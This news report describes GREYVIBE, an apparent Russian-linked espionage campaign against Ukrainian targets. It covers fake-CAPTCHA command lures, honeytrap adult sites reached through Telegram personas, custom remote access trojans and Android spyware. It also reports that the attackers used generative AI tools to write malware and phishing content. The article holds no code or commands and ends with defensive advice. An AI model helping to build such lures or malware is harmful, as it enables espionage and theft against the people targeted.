A newly uncovered cyber espionage operation dubbed GREYVIBE is using artificial intelligence across multiple attack stages to target Ukrainian military, government, and civilian organizations.
Researchers tracking the campaign said the GREYVIBE cyberattacks have been active since at least August 2025. The threat activity combines spear-phishing, fake CAPTCHA pages, and fraudulent adult-themed websites to distribute malware and collect intelligence linked to the Russia-Ukraine conflict.
Investigators believe the operators are Russian-speaking and likely work within the Moscow time zone. However, the group also shows strong ties to cybercrime-style operations, making attribution more complex.
AI Integrated Into the Attack Chain
One of the most notable aspects of the campaign is its extensive use of generative AI tools.
The operators appear to rely on AI platforms such as ChatGPT, Google Gemini, and Ideogram AI to accelerate malware development, phishing infrastructure creation, and post-compromise operations.
Researchers observed signs of AI-assisted coding in custom malware families, obfuscation tools, and phishing pages. Additionally, the attackers used AI-generated imagery inside lure websites and social engineering campaigns.
Security analysts believe the use of AI helps the group rapidly modify infrastructure and evade traditional attribution methods.
Multiple Campaigns Linked to GREYVIBE
The operation consists of several connected campaigns using shared malware and infrastructure.
PhantomMail Phishing Attacks
The group launched spear-phishing campaigns impersonating Ukrainian government agencies and energy organizations. Victims received malicious archive files through file-sharing services.
Once opened, the payload displayed decoy documents while silently deploying malware in the background.
PhantomClick Fake CAPTCHA Sites
In another campaign, attackers created fake Cloudflare verification pages. Victims were instructed to execute commands manually under the guise of completing a CAPTCHA challenge.
Meanwhile, the malicious commands triggered a PowerShell-based infection chain.
PrincessClub Social Engineering
The most unusual operation involved fake Ukrainian adult-club websites designed to lure military personnel.
Attackers reportedly used fake female personas on Telegram to build trust with targets before directing them to malicious sites. Some later versions even included WebRTC-based video and audio call functionality, potentially enabling live intelligence collection.
Custom Malware and Android Spyware
The GREYVIBE cyberattacks rely heavily on custom malware families, including:
- PhantomRelay – A modular PowerShell remote access trojan
- LegionRelay – A lightweight RAT used for file theft and remote commands
- FallSpy – Android spyware capable of collecting contacts, call logs, location data, and media files
Researchers also identified several custom obfuscation frameworks named LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP.
Moreover, analysts discovered operational security mistakes inside LegionRelay that exposed portions of the attackers’ backend infrastructure. This visibility allowed investigators to monitor post-compromise activity over an extended period.
Russian Nexus and Cybercrime Overlap
Although the campaigns align closely with Russian intelligence objectives, investigators said the operators do not demonstrate the sophistication typically associated with elite state-backed groups.
Instead, the activity shows overlaps with cybercriminal ecosystems, including malware-sharing patterns, cryptocurrency mining payloads, and public malware testing behavior.
Researchers assess that GREYVIBE may represent a hybrid threat group operating between traditional cybercrime and state-aligned espionage.
Security Concerns Continue to Grow
The GREYVIBE cyberattacks highlight how AI is rapidly reshaping offensive cyber operations. By combining generative AI with phishing, malware development, and deception tactics, threat actors can accelerate campaigns while reducing technical barriers.
Security teams are advised to monitor for suspicious PowerShell activity, fake CAPTCHA lures, and unusual outbound connections tied to remote access malware. Additionally, organizations supporting Ukraine or related sectors should strengthen phishing defenses and endpoint monitoring capabilities.
No Comment! Be the first one.